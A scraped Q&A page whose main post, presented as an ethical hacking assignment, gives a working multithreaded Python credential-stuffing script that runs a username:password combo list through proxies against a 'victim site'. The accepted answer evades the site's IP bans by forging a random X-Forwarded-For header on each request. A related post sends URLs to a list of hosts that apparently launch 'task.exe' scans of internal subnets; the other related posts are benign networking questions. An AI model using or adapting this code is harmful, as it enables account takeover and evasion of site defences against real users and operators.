As part of an ethical hacking camp, I am working on an assignment where I have to make multiple login requests on a website using proxies. To do that I've come up with the following code:
import requests
from Queue import Queue
from threading import Thread
import time
from lxml import html
import json
from time import sleep
from math import ceil
global proxy_queue
global user_queue
global hits
global stats
global start_time
def get_default_header():
return {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0',
'X-Requested-With': 'XMLHttpRequest',
'Referer': 'https://www.example.com/'
}
def make_requests():
global user_queue
while True:
uname_pass = user_queue.get().split(':')
status = get_status(uname_pass[0], uname_pass[1].replace('\n', ''))
if status == 1:
hits.put(uname_pass)
stats['hits'] += 1
if status == 0:
stats['fake'] += 1
if status == -1:
user_queue.put(':'.join(uname_pass))
stats['IP Banned'] += 1
if status == -2:
stats['Exception'] += 1
user_queue.task_done()
def get_status(uname, password):
global proxy_queue
try:
if proxy_queue.empty():
print 'Reloaded proxies, sleeping for 2 mins'
sleep(120)
session = requests.session()
proxy = 'http://' + proxy_queue.get()
login_url = 'http://example.com/login'
header = get_default_header()
header['X-Forwarded-For'] = '8.8.8.8'
login_page = session.get(
login_url,
headers=header,
proxies={
'http':proxy
}
)
tree = html.fromstring(login_page.text)
csrf = list(set(tree.xpath("//input[@name='csrfmiddlewaretoken']/@value")))[0]
payload = {
'email': uname,
'password': password,
'csrfmiddlewaretoken': csrf,
}
result = session.post(
login_url,
data=payload,
headers=header,
proxies={
'http':proxy
}
)
if result.status_code == 200:
if 'access_token' in session.cookies:
return 1
elif 'Please check your email and password.' in result.text:
return 0
else:
# IP banned
return -1
else:
# IP banned
return -1
except Exception as e:
print e
return -2
def populate_proxies():
global proxy_queue
proxy_queue = Queue()
with open('nice_proxy.txt', 'r') as f:
for line in f.readlines():
proxy_queue.put(line.replace('\n', ''))
def hit_printer():
while True:
sleep(5)
print '\r' + str(stats) + ' Combos/min: ' + str((stats['hits'] + stats['fake'])/((time.time() - start_time)/60)),
if __name__ == '__main__':
global user_queue
global proxy_queue
global stats
global start_time
stats = dict()
stats['hits'] = 0
stats['fake'] = 0
stats['IP Banned'] = 0
stats['Exception'] = 0
threads = 200
hits = Queue()
uname_password_file = '287_uname_pass.txt'
populate_proxies()
user_queue = Queue(threads)
for i in range(threads):
t = Thread(target=make_requests)
t.daemon = True
t.start()
hit_printer = Thread(target=hit_printer)
hit_printer.daemon = True
hit_printer.start()
start_time = time.time()
try:
count = 0
with open(uname_password_file, 'r') as f:
for line in f.readlines():
count += 1
if count > 2000:
break
user_queue.put(line.replace('\n', ''))
user_queue.join()
print '####################Result#####################'
while not hits.empty():
print hits.get()
ttr = round(time.time() - start_time, 3)
print 'Time required: ' + str(ttr)
print 'average combos/min: ' + str(ceil(2000/(ttr/60)))
except Exception as e:
print e
So it is expected to make many requests to the website through multiple threads, but it doesn't work as expected: after a few requests the proxies get banned and it stops working. Since I'm disposing of each proxy after I use it, that shouldn't be the case, so I believe it might be due to one of the following:
In an attempt to make multiple requests using multiple sessions, it is somehow failing to keep the sessions separate, perhaps because requests sessions don't support this kind of concurrent use.
The victim site bans IPs by group, e.g., banning all IPs starting with 132.x.x.x after receiving multiple requests from any of the 132.x.x.x IPs.
The victim site is using headers like 'X-Forwarded-For', 'Client-IP', 'Via', or a similar header to detect the originating IP. But that seems unlikely, because I can log in via my browser without any proxy and it doesn't throw any error, meaning my IP isn't exposed in any sense.
I am unsure whether I'm making an error in the threading part or the requests part; any help is appreciated.
I have figured out what the problem was, thanks to @Martijn Pieters; as usual, he's a lifesaver.
I was using elite-level proxies, so there should have been no way for the victim site to find my IP address; however, it was using X-Forwarded-For to detect my real IP.
Since elite-level proxies do not expose the client IP and don't attach a Client-IP header, the only way the victim could detect my IP was through the last address in X-Forwarded-For. The solution is to set the X-Forwarded-For header to a random IP address every time a request is made, which successfully spoofs the victim site into believing that the request is legitimate.
header['X-Forwarded-For'] = '.'.join([str(random.randint(0,255)) for i in range(4)])
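For completeness, here is a minimal sketch of how that line could be wired into the code above. It assumes the get_default_header() helper from the question, needs import random, and the helper name get_spoofed_header is my own:

import random

def get_spoofed_header():
    # Start from the default headers and overwrite X-Forwarded-For with a
    # fresh random IPv4 address for every request.
    header = get_default_header()
    header['X-Forwarded-For'] = '.'.join(str(random.randint(0, 255)) for _ in range(4))
    return header

In get_status(), header = get_default_header() would then become header = get_spoofed_header(), and the hard-coded header['X-Forwarded-For'] = '8.8.8.8' line can be dropped, so both the GET and the POST carry a different forged address each time.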
Related
I am trying to test AWS WAF using Python 3. The idea is to send 500 to 1000 HTTP requests in N seconds/minutes and print the status code of each request. The time needs to be specified by the user, e.g., whether to send 1000 requests over 5 minutes or all 1000 requests in 1 second.
I am not able to implement the timing.
How can I make this work? Below is my code so far:
import requests
import time
import threading
countRequests = 0
countSuccessRequests = 0
countFailedRequests = 0
countAllowRequests = 0
countBlockedRequests = 0
countErrors = 0
class Requester(threading.Thread):
def __init__(self, url, w):
threading.Thread.__init__(self)
self.url = url
self.w = w
def run(self):
global countRequests
global countSuccessRequests
global countFailedRequests
global countAllowRequests
global countBlockedRequests
global countErrors
try:
r = requests.get(self.url)
countSuccessRequests+=1
if (r.status_code == 200):
countAllowRequests+=1
print(f"countRequest: {countAllowRequests}, statusCode: {r.status_code}")
if (r.status_code == 403):
countBlockedRequests+=1
print(f"Blocked: {countBlockedRequests}, statusCode: {r.status_code}")
if (r.status_code != 200 and r.status_code != 403):
print(f'Failed: code= {r.status_code}, sample: {self.w}')
except (requests.Timeout, requests.ConnectionError, requests.HTTPError) as err:
countFailedRequests+=1
if __name__ == '__main__':
url = 'URL-HERE'
print(f"url: {url}")
requ = 150
for w in range(1, requ, +1):
req = Requester(url,w)
req.start()
time.sleep(0)
I tried searching on Stack Overflow, but I was not able to build the logic for it.
I would appreciate it if someone could point me to the correct thread or help me build one.
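Not a definitive answer, but here is a minimal sketch of one way the pacing could work: space the request starts evenly across the requested window, so 1000 requests over 5 minutes means starting one roughly every 0.3 seconds. The function names, the counters, and the simplified error handling are my own assumptions:

import threading
import time
import requests

def send_request(url, index):
    # Fire a single request and report its status code.
    try:
        r = requests.get(url, timeout=10)
        print(f"request {index}: status {r.status_code}")
    except requests.RequestException as err:
        print(f"request {index}: failed ({err})")

def run_load(url, total_requests, duration_seconds):
    # Start one request every (duration / count) seconds so the whole
    # batch is spread across the requested window.
    interval = duration_seconds / total_requests
    threads = []
    for i in range(total_requests):
        t = threading.Thread(target=send_request, args=(url, i))
        t.start()
        threads.append(t)
        time.sleep(interval)
    for t in threads:
        t.join()

# Example: 1000 requests spread over 5 minutes; pass a 1-second duration
# to fire them almost back to back.
# run_load('URL-HERE', 1000, 5 * 60)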
I am trying to increment start_ip and end_ip by 1 on each iteration. However, whenever the function hits the else branch ('already active'), the counter keeps incrementing. Is there a way to stop number1 from advancing in the for loop when it hits an IP that is already active? I tried decrementing it by one and adding a break, but that does not seem to work.
#!/usr/bin/env python3
import requests
import time
import re
headers = {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8','User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0','Accept-Encoding': 'gzip, deflate','Upgrade-Insecure-Requests': '1','Accept-Language': 'en-US,en;q=0.5'}
def log(ip):
log = open("ip_active.txt","a+")
log.write(ip)
log.close()
def start_ip():
x = 0
while x == 0:
for number1 in range(1,254):
start_ip = '192.168.' + str(number1) + '.1'
end_ip = '192.168.' + str(number1) +'.254'
with open('ip_list.txt', 'r') as iplist:
for ip in iplist:
with open('ip_active.txt', 'r') as ipactive:
try:
if(ip not in ipactive):
log(ip)
print('Running task: ' + ip +f'task.exe%20{start_ip}%20{end_ip}')
target = ip.strip()+f'task.exe%20{start_ip}%20{end_ip}'
r = requests.get(target, allow_redirects=True, verify=False, headers=headers, timeout=1)
else:
#Here number1 keeps incrementing as well but should not.
print(f'ip {ip} already active')
time.sleep(2)
except:
print('Timeout')
continue
def main():
start_ip()
if __name__ == "__main__":
main()
Output:
ip http://172.16.86.153 already active
ip http://172.16.86.152 already active
Running task: http://172.16.86.153/?747fb083889d4d3591b8e185032f958c= task.exe%20192.168.**1**.1%20192.168.**1**.254
Running task: http://172.16.86.152/?93440f9cf9f743f2b5e4269ec73d4b78= task.exe%20192.168.**2**.1%20192.168.**2**.254
ip http://172.16.86.153 already active
ip http://172.16.86.152 already active
It should continue with:
Running task: http://172.16.86.152/?93440f9cf9f743f2b5e4269ec73d4b78= task.exe%20192.168.**3**.1%20192.168.**3**.254
Running task: http://172.16.86.153/?93440f9cf9f743f2b5e4269ec73d4b78= task.exe%20192.168.**4**.1%20192.168.**4**.254
but now it results in, for example:
Running task: http://172.16.86.152/?93440f9cf9f743f2b5e4269ec73d4b78= task.exe%20192.168.**120**.1%20192.168.**120**.254
Running task: http://172.16.86.153/?93440f9cf9f743f2b5e4269ec73d4b78= task.exe%20192.168.**121**.1%20192.168.**121**.254
As can be seen, when an IP is available the task runs with, for example, 192.168.12.1 192.168.12.254, then for the next IP 192.168.13.1 192.168.13.254, then 192.168.14.1 192.168.14.254, and so on. However, when an IP is already active, the counter keeps counting anyway, so those ranges are skipped for Running tasks.
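One way to get that behaviour is sketched below, reusing the log() helper, headers dict, and file names from the question: keep number1 as a plain counter instead of a for-loop variable, and only advance it after a task has actually been dispatched, so "already active" IPs never consume a range.

def start_ip():
    number1 = 1  # advanced only when a task is actually launched
    while number1 <= 254:
        with open('ip_list.txt', 'r') as iplist:
            for ip in iplist:
                with open('ip_active.txt', 'r') as ipactive:
                    already_active = ip in ipactive.read()
                if already_active:
                    print(f'ip {ip.strip()} already active')
                    time.sleep(2)
                    continue
                start_range = f'192.168.{number1}.1'
                end_range = f'192.168.{number1}.254'
                log(ip)
                target = ip.strip() + f'task.exe%20{start_range}%20{end_range}'
                print('Running task: ' + target)
                try:
                    requests.get(target, allow_redirects=True, verify=False,
                                 headers=headers, timeout=1)
                except requests.RequestException:
                    print('Timeout')
                number1 += 1  # consume a /24 range only for dispatched tasks
                if number1 > 254:
                    return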
I am observing that with the Python requests module, HTTP keep-alive is not being honored.
I don't see ACKs for the keep-alive being sent from the host where I am running the Python script.
Please let me know how it can be fixed. Following is my code:
import json
import requests
import logging
import sys
import time
from threading import Thread
logging.basicConfig(level=logging.DEBUG)
class NSNitro:
def __init__(self,*args):
if len(args) > 2:
self.ip = args[0]
self.username = args[1]
self.password = args[2]
self.session_id = None
url = 'http://'+self.ip+'/nitro/v1/config/login'
payload = { "login": { "username":"nsroot", "password":"nsroot" }}
headers = {"Content-type": "application/json", 'Connection': 'keep-alive'}
try:
r = requests.post(url=url,headers=headers,data=json.dumps(payload),timeout=5)
logging.info(r.json()["sessionid"])
if(r.json()["sessionid"] != None):
self.session_id = r.json()["sessionid"]
except requests.exceptions.RequestException:
logging.critical("Some error occurred during connection")
else:
logging.error("Not sufficient parameters provided.Required : ipaddress , username , password")
def install_build(self,build_url):
url = 'http://' + self.ip + '/nitro/v1/config/install'
headers = {"Content-type": "application/json","Connection": "keep-alive"}
payload = {"install": {"url": build_url}}
try:
cookie = {"NITRO_AUTH_TOKEN": self.session_id}
r = requests.post(timeout=5, url=url, data=json.dumps(payload), headers=headers,cookies=cookie)
except requests.exceptions.RequestException:
print("Connection Error occurred")
raise  # re-raise so the details of the exception are visible
else:
assert r.status_code == 201, "Status code seen: " + str(r.status_code) + "\n" + "Error message from system: " + \
r.json()["message"]
print("Successfully triggered job on device to install build")
def __del__(self):
logging.debug("Deleted the object")
if __name__ == '__main__':
ns_session = NSNitro(ip,username,password)
url_i = 'https://myupload-server.net/build-13.0-480.16.tgz'
t1 = Thread(target=ns_session.install_build,args=(url_i,))
t1.start()
''' while t1.is_alive():
t2 = Thread(target=ns_session.get_installed_version,)
t2.start()
t2.join()'''
time.sleep(100)
logging.info("Install thread completed")
t1.join()
ns_session.logout()
When the request is posted using the curl command, the ACKs are sent at the specified keep-alive intervals. Without the ACKs being sent, the server resets the connection.
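One thing worth noting: the module-level requests.post() calls above each open and close their own connection, so nothing is actually kept alive between the login and the install call; connection pooling and keep-alive in requests are tied to a Session object. Below is a rough sketch, reusing the question's endpoints and payloads with error handling trimmed, of how one Session per NSNitro instance could let both calls share the same persistent connection:

import json
import requests

class NSNitro:
    def __init__(self, ip, username, password):
        self.ip = ip
        # requests only reuses (keeps alive) TCP connections that are made
        # through the same Session, so store one per instance.
        self.session = requests.Session()
        self.session.headers.update({"Content-type": "application/json",
                                     "Connection": "keep-alive"})
        url = 'http://' + self.ip + '/nitro/v1/config/login'
        payload = {"login": {"username": username, "password": password}}
        r = self.session.post(url, data=json.dumps(payload), timeout=5)
        self.session_id = r.json()["sessionid"]
        self.session.cookies.set("NITRO_AUTH_TOKEN", self.session_id)

    def install_build(self, build_url):
        # This POST can now travel over the same persistent connection that
        # was opened during login, instead of a brand-new one.
        url = 'http://' + self.ip + '/nitro/v1/config/install'
        payload = {"install": {"url": build_url}}
        r = self.session.post(url, data=json.dumps(payload), timeout=5)
        return r.status_code

Note that an idle HTTP keep-alive connection does not by itself generate periodic ACKs; the periodic ACKs seen with curl are most likely TCP-level keepalive probes, which requests does not enable by default, so a long idle pause may still be cut off by the server's own timeout.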
I have a Python program which makes some API calls and prints some output depending on the API's response. I am using the flush=True argument in the print() calls. Sometimes the program looks hung (it won't print anything to the terminal), but when I press Ctrl-C some output is printed and Python appears to resume again. I have not written any signal handler for SIGINT. Why does this happen?
UPDATE (Added python code)
import requests
import config
import json
from ipaddress import IPv4Address, IPv4Network
ip_list = []
filepath = "ip_address_test.txt"
with open(filepath) as fp:
line = fp.readline()
ip_list.append(line.rstrip())
while line:
line = fp.readline()
ip_list.append(line.rstrip())
print(ip_list)
del ip_list[-1]
sysparm_offset = 0
sysparm_limit = 2
flag = 1
for ip in ip_list:
hosts = []
while flag == 1:
print("ip is "+str(ip), flush=True)
# Set the request parameters
url = 'https://xxx.service-now.com/api/now/table/u_cmdb_ci_subnet?sysparm_query=u_lifecycle_status!=end of life^GOTOname>='+ip+'&sysparm_limit='+str(sysparm_limit)+'&sysparm_offset='+str(sysparm_offset)
# Eg. User name="username", Password="password" for this code sample.
user = config.asknow_username
pwd = config.asknow_password
headers = {"Accept":"application/json"}
# Do the HTTP request
response = requests.get(url, auth=(user, pwd), headers=headers,verify=False)
# Check for HTTP codes other than 200
if response.status_code != 200:
print('Status:', response.status_code, 'Headers:', response.headers, 'Error Response:', response.content)
exit()
# Decode the json response into a dictionary and use the data
result = json.loads(response.content)['result']
iter = 0
while iter < sysparm_limit:
print("iter = "+str(iter),flush=True)
print("checking "+result[iter]["name"], flush=True)
id = result[iter]["u_guid"]
url = "https://xxx.service-now.com/api/now/cmdb/instance/u_cmdb_ci_subnet/" + str(id)
response = requests.get(url, auth=(user, pwd), headers=headers,verify=False)
# Check for HTTP codes other than 200
if response.status_code != 200:
print('Status:', response.status_code, 'Headers:', response.headers, 'Error Response:', response.content)
exit()
result1 = json.loads(response.content)['result']
for relation in result1["outbound_relations"]:
if relation["type"]["display_value"] == "IP Connection::IP Connection":
if IPv4Address(relation["target"]["display_value"]) in IPv4Network(ip):
print("appending host", flush=True)
hosts.append(relation["target"]["display_value"])
else:
print("ip not in subnet", flush=True)
flag = 0
break
if flag == 0:
break
iter = iter+1
sysparm_offset = sysparm_offset + 2
with open('output.txt',"a+") as output_file:
for value in hosts:
output_file.write(str(value)+"\n")
print("completed "+ip,flush=True)
flag = 1
I am not sure if my issue is the same, since you didn't mention clicking inside the command prompt or whether it also resumes when pressing something besides Ctrl-C, but it sounds a lot like what I had.
A little more googling led me to an insight I wish I had found as an answer to your question a while ago:
https://www.davici.nl/blog/the-mystery-of-hanging-batch-script-until-keypress
I had no idea a QuickEdit mode existed, but besides following the steps in the article, you can also simply open the command prompt, right-click the title bar, choose "Defaults", and then under "Edit Options" disable "QuickEdit Mode".
I hope this helps you (or someone else) as much as it just helped me
I'm building a proxy checker using multiple threads, specifically a thread pool from:
from multiprocessing.dummy import Pool as ThreadPool
The HTTP requests are made using urllib2.
What I want to do is run 20 requests for each proxy. If it were single-threaded it would take too much time; that's where the power of multithreading helps. So once I set up the proxy I want to run those 20 requests and manage two things: first, count the exceptions and drop the proxy if too many occur; second, save the average response time and present it later.
I just can't manage to implement the above, but I have implemented it with a single thread:
import socket
import ssl
import time
import urllib
import urllib2
import httplib
proxyList = []
def loadProxysFromFile(fileName):
global proxyList
with open(fileName) as f:
proxyList = [line.rstrip('\n') for line in f]
def setUrllib2Proxy(proxyAddress):
proxy = urllib2.ProxyHandler({
'http': "http://" + proxyAddress,
'https': "https://" + proxyAddress
})
opener = urllib2.build_opener(proxy)
urllib2.install_opener(opener)
def timingRequest(proxy, url):
error = False
setUrllib2Proxy(proxy)
start = time.time()
try:
req = urllib2.Request(url)
urllib2.urlopen(req, timeout=5) #opening the request (getting a response)
except (urllib2.URLError, httplib.BadStatusLine, ssl.SSLError, socket.error) as e:
error = True
end = time.time()
timing = end - start
if error:
print "Error with proxy " + proxy
return 0
else:
print proxy + " Request to " + url + " took: %s" %timing + " seconds."
return timing
# Main
loadProxysFromFile("proxyList.txt")
for proxy in proxyList:
print "Testing: " + proxy
print "\n"
REQUEST_NUM = 20
ERROR_TOLERANCE_NUM = 3
resultList = []
for proxy in proxyList:
avgTime = 0
errorCount = 0
for x in range(0, REQUEST_NUM):
result = timingRequest(proxy, 'https://www.google.com')
if (result == 0):
errorCount += 1
if (errorCount >= ERROR_TOLERANCE_NUM):
break
else:
avgTime += result
if (errorCount < ERROR_TOLERANCE_NUM):
avgTime = avgTime/(REQUEST_NUM-errorCount)
resultList.append(proxy + " has an average response time of: %s" %avgTime)
print '\n'
print "Results Summery: "
print "-----------------"
for res in resultList:
print res
Things that must be done are:
For every proxy, wait until all 20 requests are finished before moving on to the next proxy, and somehow synchronize the threads when they add up their timings to calculate the average response time (without taking the exceptions into account).
The best solution I've read so far is using from multiprocessing.dummy import Pool as ThreadPool and pool.map(func, iterable), but I can't figure out how to implement it in my code.
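A rough sketch of how pool.map could be bolted onto the existing helpers is below. It reuses setUrllib2Proxy, timingRequest, and proxyList from above; the checkProxy name and the thread count are my own, and unlike the single-threaded loop it cannot stop early once the error tolerance is reached, since all 20 requests are submitted up front:

from multiprocessing.dummy import Pool as ThreadPool

REQUEST_NUM = 20
ERROR_TOLERANCE_NUM = 3
THREADS = 10

def checkProxy(proxy, url='https://www.google.com'):
    # All 20 requests for this proxy run concurrently; pool.map blocks
    # until every one of them has finished, so the next proxy is only
    # started after this batch is completely done.
    setUrllib2Proxy(proxy)
    pool = ThreadPool(THREADS)
    timings = pool.map(lambda _: timingRequest(proxy, url), range(REQUEST_NUM))
    pool.close()
    pool.join()
    errorCount = timings.count(0)  # timingRequest returns 0 on error
    if errorCount >= ERROR_TOLERANCE_NUM:
        return proxy + " dropped: too many errors"
    goodTimings = [t for t in timings if t != 0]
    avgTime = sum(goodTimings) / len(goodTimings)
    return proxy + " has an average response time of: %s" % avgTime

resultList = [checkProxy(proxy) for proxy in proxyList]

Because setUrllib2Proxy installs a global opener, this only works as long as every concurrent request in a batch goes through the same proxy, which is exactly the case here since proxies are still processed one at a time.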